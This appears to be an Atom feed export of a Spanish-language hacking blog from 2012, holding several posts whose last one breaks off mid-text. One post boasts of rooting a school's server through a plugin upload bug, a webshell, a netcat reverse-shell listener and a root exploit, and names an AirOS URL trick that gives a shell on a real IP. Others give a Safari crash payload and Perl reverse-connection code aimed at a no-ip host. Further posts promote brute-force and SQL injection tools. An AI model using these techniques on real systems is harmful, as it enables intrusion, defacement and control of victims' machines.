<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" gd:etag="W/&quot;D0EAR3s8eSp7ImA9WhRUFko.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876</id><updated>2012-01-27T06:47:26.571-08:00</updated><category term="Wireless" /><category term="seguridad blanca" /><category term="Hacking General" /><category term="yahoo" /><category term="csrf" /><category term="dll" /><category term="Http Hacking" /><category term="DNS" /><category term="sms" /><category term="arbitary download" /><category term="Xss" /><category term="presentacion" /><category term="dr.white" /><category term="fotos" /><category term="cookie" /><category term="full source disclosure" /><category term="spoofing" /><category term="backtrack" /><category term="anti-hacking" /><category term="meta-datos" /><category term="shadinessdark" /><category term="LDAP Injection" /><category term="php.ini" /><category term="dr. NeoX" /><category term="shell" /><category term="web 2.0" /><category term="BUG" /><category term="SSL" /><category term=".htaccess" /><category term="bypass" /><category term="dr neox" /><category term="D.O.S" /><category term="Keylogger" /><category term="safe_mode" /><category term="Informatica" /><category term="Criptografía" /><category term="diosdelared" /><category term="Cracking" /><category term="Moviles" /><category term="pharming" /><category term="programacion" /><category term="zero bits" /><category term="Url Obfuscation" /><category term="Exploit" /><category term="full path disclosure" /><category term="Sql Injection" /><category term="Carding" /><category term="root" /><category term="Sniffing" /><category term="Tool" /><category term="e-zines" /><category term="Seguridad Informática" /><category term="phishing" /><category term="hijacking" /><category term="WEP" /><category term="originales" /><category term="pen-test" /><category term="pentesting" /><category term="LFI" /><category term="Proxy" /><category term="ClickJacking" /><category term="Wifi" /><category term="Eventos de Interes..." /><category term="nuevo" /><category term="Bluetooth" /><category term="seguridadblanca" /><category term="htaccess" /><category term="Hardening" /><category term="xsrf" /><category term="mod_security" /><category term="pentest" /><category term="exif" /><category term="Defacing" /><category term="Virus y Malware" /><category term="netcat" /><category term="open-source" /><category term="Blind Sql Injection" /><title>El Blog del Dr.White - Seguridad Informática Perú</title><subtitle type="html">Hacking, Seguridad Informática Perú, Sql Injection, Blind Sql Injection, Seguridad Web, Test de Intrusión, Pentest, Auditorías de Seguridad, Programación, Ethical Hacking y mucho mas.</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://4.bp.blogspot.com/_112F2TUuD7w/SxQz-x8Wr3I/AAAAAAAAACo/oBuetfOi3Uk/S220/SB.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>434</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/seguridadblanca" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="seguridadblanca" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">seguridadblanca</feedburner:emailServiceId><feedburner:feedburnerHostname xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">http://feedburner.google.com</feedburner:feedburnerHostname><entry gd:etag="W/&quot;C0YMSX0zeip7ImA9WhRUFUk.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-6282441703760307711</id><published>2012-01-25T17:11:00.000-08:00</published><updated>2012-01-25T17:26:28.382-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-25T17:26:28.382-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="seguridad blanca" /><category scheme="http://www.blogger.com/atom/ns#" term="Exploit" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Hattrick: Rooteando mas de 3 Servers en una Noche</title><content type="html">Bueno esto que les voy a relatar ahora mismo es como rootearse fácilmente 3 servidores en una noche y uno que otro como para hacer mass (esto para los defacers):&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Necesitamos una web vulnerable o en mi caso tengo una shell ya uploaded como la subí...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://xxxx.com/ --&gt; Web de un colegio... (es VPS la info del dominio dice comprado en el año 2003).&lt;br /&gt;&lt;br /&gt;Buscando bien tienen un blog ya en desuso donde suben al parecer cosas de deporte... busco y tiene un complemento bugged de wordpres... su bug:&lt;br /&gt;&lt;br /&gt;Remote File Uploading...&lt;br /&gt;&lt;br /&gt;le pido a un colega una shell xD porque la verdad en mi pc ya no se encuentran muchas shells tengo que actualizar me da una bien interesante... luego le hago el upload... año del kernel 2007 lo que si tengo son root exploits, pongo en escucha mi nc...&lt;br /&gt;&lt;br /&gt;ncat -v -l -p 6666 me conecto de manera reversa y listo a ejecutar...&lt;br /&gt;&lt;br /&gt;./ex y listo estamos... ahora los otros dos está mas fácil aun vamos a usar este bug que me parecio interesantisimo:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://186.38.2.70/login.cgi?uri=/ los AirOs tienen un bugsaso que segun yo es un bug lucrativo porque ya es muy notorio y practicamente es un backd00r...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;cambias la ruta login.cgi por admin.cgi/sd.css y tienes una shell como esta:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-LbSrNXKIDsM/TyCrdcHXuRI/AAAAAAAAAA4/k-eXvZsblUk/s1600/shell.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 213px;" src="http://3.bp.blogspot.com/-LbSrNXKIDsM/TyCrdcHXuRI/AAAAAAAAAA4/k-eXvZsblUk/s400/shell.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5701745650502711570" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;para que mas diganme ustedes puden subir todo lo que quieran y tendrán servidores owned como quieran... encontrarlos es facilisisisisisisisimo yo encontré por lo menos 20 vulnerables en una noche... cuantos encuentran ustedes...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-6282441703760307711?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/6282441703760307711/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=6282441703760307711&amp;isPopup=true" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/6282441703760307711?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/6282441703760307711?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2012/01/hattrick-rooteando-mas-de-3-servers-en.html" title="Hattrick: Rooteando mas de 3 Servers en una Noche" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-LbSrNXKIDsM/TyCrdcHXuRI/AAAAAAAAAA4/k-eXvZsblUk/s72-c/shell.png" height="72" width="72" /><thr:total>2</thr:total></entry><entry gd:etag="W/&quot;CkYARH47eSp7ImA9WhRUFUk.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-8908699807189009956</id><published>2012-01-25T17:01:00.000-08:00</published><updated>2012-01-25T17:09:05.001-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-25T17:09:05.001-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Exploit" /><title>Provocando Pantalla Azul a travéz de Safari</title><content type="html">Bueno para que mentir xD me dio pereza levantar una virtual y lo prové en mi maquina normal... Funciona Así...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vas a tu hosting y subes un archivo llamado cualquiernombre.html y dentro le pones algo tan simple como esto:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;iframe height='18082563'&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;no tube tiempo de probar con otras cantidades en el height pero si lo probe poner en la etiqueta img pero no funcionó... sirve para que? en realidad para nada mas que trollear salvo que ustedes le puedan dar un uso un poco mas util que yo :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Datos del que lo encontró:&lt;br /&gt;&lt;br /&gt;# Exploit Title: GdiDrawStream BSoD&lt;br /&gt;# Date: 18-12-2011&lt;br /&gt;# Author: webDEViL&lt;br /&gt;# Version: Latest&lt;br /&gt;# Tested on: Windows 7 x64 using Safari&lt;br /&gt;# http://twitter.com/w3bd3vil&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;yo probé también en win 7 en 64 bits...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-8908699807189009956?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/8908699807189009956/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=8908699807189009956&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/8908699807189009956?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/8908699807189009956?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2012/01/provocando-pantalla-azul-travez-de.html" title="Provocando Pantalla Azul a travéz de Safari" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;Dk8GSXw9eyp7ImA9WhRVE00.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-3610575788622260802</id><published>2012-01-11T09:11:00.000-08:00</published><updated>2012-01-11T10:00:28.263-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-11T10:00:28.263-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Virus y Malware" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Conexion Inversa Orientado a Malware</title><content type="html">Escribo esto para explicarles masomenos como funcionan algunos malwares que se desarrollan ahora.&lt;br /&gt;&lt;br /&gt;Lo que hacen es que las personas se conecten a la PC del Atacante y no El Atacante a la PC de la Víctima.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Set My PC:&lt;br /&gt;&lt;br /&gt;Vamos a hacer lo siguiente, vamos a http://www.no-ip.com/ y nos vamos a registrar luego nos logueamos y vamos a ir a la pestaña Add a Host del Menu.&lt;br /&gt;&lt;br /&gt;En El Host Name Ponemos SeguridadBlanca o bueno lo que deseen en este caso será SeguridadBlanca y al lado seleccionan lo que quieren yo escogí no-ip.org.&lt;br /&gt;&lt;br /&gt;En la opcion de abajo donde dice: Host Type ponganlo en DNS Host (A) en la ip dejenla como está. Luego denle click al Boton Create Host.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora Deben de Bajarse el Client de No-IP:&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.no-ip.com/downloads.php"&gt;Download desde aquí&lt;/a&gt; yo en este caso estoy booteando mi win7 asi que me bajo la version para windows :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora me la bajo instalo todo y cuando abro me pide que me loguee, me logueo con mi cuenta de no-ip y aparecerá SeguridadBlanca.no-ip.org seleccionan el checkbox y ponen Save... luego les deben de salir tres checks:&lt;br /&gt;&lt;br /&gt;Client ID&lt;br /&gt;Updating&lt;br /&gt;IP&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;si no te salen los tres checks es porque hay algo mal xD no funcionará muy bien si sales por proxy o estás en la oficina donde te bloquean cosas.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora lo anterior de Setiar el no-ip es por dos motivos: El primero es porque nuestra ip cambia constantemente por lo menos en mi pais es así entonces para no tener que estar cambiando y cambiando pues usamos el no-ip que nos mantiene una ip seguridadblanca.no-ip.org y el otro motivo es para un tema de ocultar nuestra ip.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora vamos a crear la conexion inversa.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;use IO::Socket;&lt;br /&gt;my $sock = new IO::Socket::INET (&lt;br /&gt;                                  PeerAddr =&gt; 'seguridadblanca.no-ip.org',&lt;br /&gt;                                  PeerPort =&gt; '90',&lt;br /&gt;                                  Proto =&gt; 'tcp',&lt;br /&gt;                                 );&lt;br /&gt;die "No se creo el socket: $!\n" unless $sock;&lt;br /&gt;print $sock "Soy tu Victima\n";&lt;br /&gt;close($sock);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno con eso se nos conecta la victima :) &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;aqui tambien tienen un &lt;a href="http://seguridadblanca.blogspot.com/2009/06/tutorial-haciendochat-en-visual-basic.html"&gt;chat&lt;/a&gt; en visual basic basado en sockets que pueden usar... adapten los sockets nomas bueno y ese code de perl es solo para hacer la conexion luego nuestro server debe correr en el puerto 90 y genial tenemos a las victimas conectadas a nosotros.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Camilo G.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-3610575788622260802?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/3610575788622260802/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=3610575788622260802&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3610575788622260802?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3610575788622260802?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2012/01/conexion-inversa-orientado-malware.html" title="Conexion Inversa Orientado a Malware" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;C0QDQX45cCp7ImA9WhRVE00.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-2659658427168012692</id><published>2012-01-11T08:50:00.000-08:00</published><updated>2012-01-11T09:02:50.028-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-11T09:02:50.028-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><category scheme="http://www.blogger.com/atom/ns#" term="Sql Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="Tool" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Arachni Open Source Security Scanner</title><content type="html">Arachni es un "nuevo" FrameWork Open Source Desarrollado en Ruby Para Analizar Bugs en Websites y asi ayudar a que tu web deje de ser vulnerable.&lt;br /&gt;&lt;br /&gt;Su funcionamiento básicamente es que hace una especie de SiteMap y luego basado en las url obtenidas comienza a hacer un escaneo, la velocidad es normal ni rápido ni lento y no es tan noob friendly.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Corre en Linux y para Windows viene con librerias Cygwin.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para ver mas información puedes consultar &lt;a href="http://trainofthought.segfault.gr/2012/01/07/arachni-v0-4-is-out/"&gt;aquí&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Descarga:&lt;br /&gt;&lt;br /&gt;&lt;a href="https://github.com/Zapotek/arachni/downloads/arachni-v0.4.0.2-cde.tar.gz"&gt;Linux&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://downloads.segfault.gr/arachni/arachni-v0.4.0.2-cygwin.exe"&gt;Windows&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Desde que me desperté lo anduve provando en localhost en linux, y funciona bien lo unico malo es que a veces como que se lentejea o si el bug hace redirección lo caga al scanner tambien.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-2659658427168012692?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/2659658427168012692/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=2659658427168012692&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2659658427168012692?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2659658427168012692?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2012/01/arachni-open-source-security-scanner.html" title="Arachni Open Source Security Scanner" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;CkUNQX87fCp7ImA9WhRVEEk.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-2367291404385228284</id><published>2012-01-08T08:21:00.000-08:00</published><updated>2012-01-08T08:31:30.104-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-08T08:31:30.104-08:00</app:edited><title>Absinthe Blind SQL Injection Tool</title><content type="html">Sinceramente me cuesta demaciado inyectar sql blind principalmente por que soy desesperado y eso de estar esperando no va conmigo, asi que bueno encontré esta tool en un foro y me parecio bien interesante la prové con una web de un amigo que tiene blind y la verdad es que el scanner es un poco lento pero funciona bien.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Caracteristicas:&lt;br /&gt;&lt;br /&gt;- Totalmente automático, no encuentra la sqli tu se la debes dar.&lt;br /&gt;- Inyecta MSsql, Postgres Sql y Oracle.&lt;br /&gt;- Puedes editar el query.&lt;br /&gt;- Soporta proxy.&lt;br /&gt;- GUI.&lt;br /&gt;- Algunas Más.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mi Experiencia: Yo la prové en una blind en la web de un amigo, era MySql, aun no he tenido la oportunidad de provarlos con las otras bds pero en mysql corrió perfectamente.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.0x90.org/releases/absinthe/download.php" about="_blank"&gt;Descarga&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.0x90.org/releases/absinthe/" about="_blank"&gt;Informacion y Documentacion&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-2367291404385228284?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/2367291404385228284/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=2367291404385228284&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2367291404385228284?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2367291404385228284?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2012/01/absinthe-blind-sql-injection-tool.html" title="Absinthe Blind SQL Injection Tool" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;DUAMQ3o5fCp7ImA9WhRVEE4.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-5523040264554549120</id><published>2012-01-08T07:18:00.000-08:00</published><updated>2012-01-08T07:49:42.424-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-08T07:49:42.424-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Tool" /><category scheme="http://www.blogger.com/atom/ns#" term="Cracking" /><title>Te quedó chico el hydra? Patator!</title><content type="html">Patator es un nuevo brute forcer que basa sus características en los errores y complejidades que tienen herramientas como el hydra, el medusa, el brutus, el ncrack y muchas otras herramientas, quien una vez no quizo hacer una herramienta de bruteforce que se le adapte a sus necesidades... este tipo del Patator la ha desarrollado para ti.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Desventajas de algunas tools:&lt;br /&gt;&lt;br /&gt;- Lentas.&lt;br /&gt;- Dan Resultados Falsos.&lt;br /&gt;- No Funcionan.&lt;br /&gt;- Son muy simples.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ventajas del Patator:&lt;br /&gt;&lt;br /&gt;- Multithread (Es rápido)&lt;br /&gt;- Sus Resultados realmente se basan en codigo.&lt;br /&gt;- Muchos mas.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sus Características:&lt;br /&gt;&lt;br /&gt;ftp_login : Brute-force FTP&lt;br /&gt;ssh_login : Brute-force SSH&lt;br /&gt;telnet_login : Brute-force Telnet&lt;br /&gt;smtp_login : Brute-force SMTP&lt;br /&gt;smtp_vrfy : Enumerate valid users using the SMTP VRFY command&lt;br /&gt;smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command&lt;br /&gt;http_fuzz : Brute-force HTTP/HTTPS&lt;br /&gt;pop_passd : Brute-force poppassd (not POP3)&lt;br /&gt;ldap_login : Brute-force LDAP&lt;br /&gt;smb_login : Brute-force SMB&lt;br /&gt;mssql_login : Brute-force MSSQL&lt;br /&gt;oracle_login : Brute-force Oracle&lt;br /&gt;mysql_login : Brute-force MySQL&lt;br /&gt;pgsql_login : Brute-force PostgreSQL&lt;br /&gt;vnc_login : Brute-force VNC&lt;br /&gt;dns_forward : Forward lookup subdomains&lt;br /&gt;dns_reverse : Reverse lookup subnets&lt;br /&gt;snmp_login : Brute-force SNMPv1/2 and SNMPv3&lt;br /&gt;unzip_pass : Brute-force the password of encrypted ZIP files&lt;br /&gt;keystore_pass : Brute-force the password of Java keystore files&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Las que he provado:&lt;br /&gt;&lt;br /&gt;Brute-Force SSH&lt;br /&gt;Brute-Force FTP&lt;br /&gt;Brute-Force Telnet&lt;br /&gt;Brute-Force Mysql&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lo que he notado de la tool, no es tanto que sea muy diferente a las otras, lo que he visto es que el código, escrito en python,  está mas limpio y además, es más rapido que cualquier otro que haya provado.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://patator.googlecode.com/files/patator_v0.3.py"&gt;Descarga&lt;/a&gt;&lt;br /&gt;&lt;a href="http://code.google.com/p/patator/"&gt;Mas Información&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-5523040264554549120?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/5523040264554549120/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=5523040264554549120&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5523040264554549120?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5523040264554549120?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2012/01/te-quedo-chico-el-hydra-patator.html" title="Te quedó chico el hydra? Patator!" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;CUMMQ30yeCp7ImA9WhRVEE4.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-5736128532052056793</id><published>2012-01-08T06:36:00.000-08:00</published><updated>2012-01-08T06:38:02.390-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-08T06:38:02.390-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="seguridad blanca" /><title>Nuevas Vibras para SeguridadBlanca</title><content type="html">Bueno desde el día de hoy comenzaré a dedicarle mas tiempo al blog no solo para poner tutoriales hechos por mi sino también artículos de interes que sé que los podrán necesitar en algún momento.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-5736128532052056793?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/5736128532052056793/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=5736128532052056793&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5736128532052056793?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5736128532052056793?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2012/01/nuevas-vibras-para-seguridadblanca.html" title="Nuevas Vibras para SeguridadBlanca" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DU4GQnc4fyp7ImA9WhRWF08.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-3897667581730243001</id><published>2012-01-04T17:25:00.000-08:00</published><updated>2012-01-04T17:45:23.937-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-04T17:45:23.937-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Sql Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="full path disclosure" /><title>Sql Injection en ESET LATINOAMERICA</title><content type="html">Bueno Resulta que hace tiempo yo trabajaba como freelance en una blog de malware me pagaban 100$ al mes ademas de una recompensa si es que uno de mis posts era el favorito del mes... y en una de las veces que decidi hacerle un escaneo con las manos como a mi me gusta yo no soy mucho de tools por que siempre la creatividad humana será mejor que la de un bot pero bueno analizo y encontré que habia una sqlinjection caletasa el cms que usabamos era un sistema de noticias no recuerdo cual tuneado por un programador de php que estaba mucho tiempo atras en el website la sqli estaba en el buscador... era simple tan facil como una comilla... el bug es parecidisimo al que encontré en ESET, un video donde les muestro que habia una sqli en eset, confirme que se podia hacer union y select. esto se puede reparar con un mysqlscapestrings a porcierto no le pongan muchos filtros a su web por que sino se van a ver puros backslash(\) por toda su web como la web de una empresa peruana que es tan insegura de como filtrar que filtra hasta los echo...&lt;br /&gt;&lt;br /&gt;&lt;br 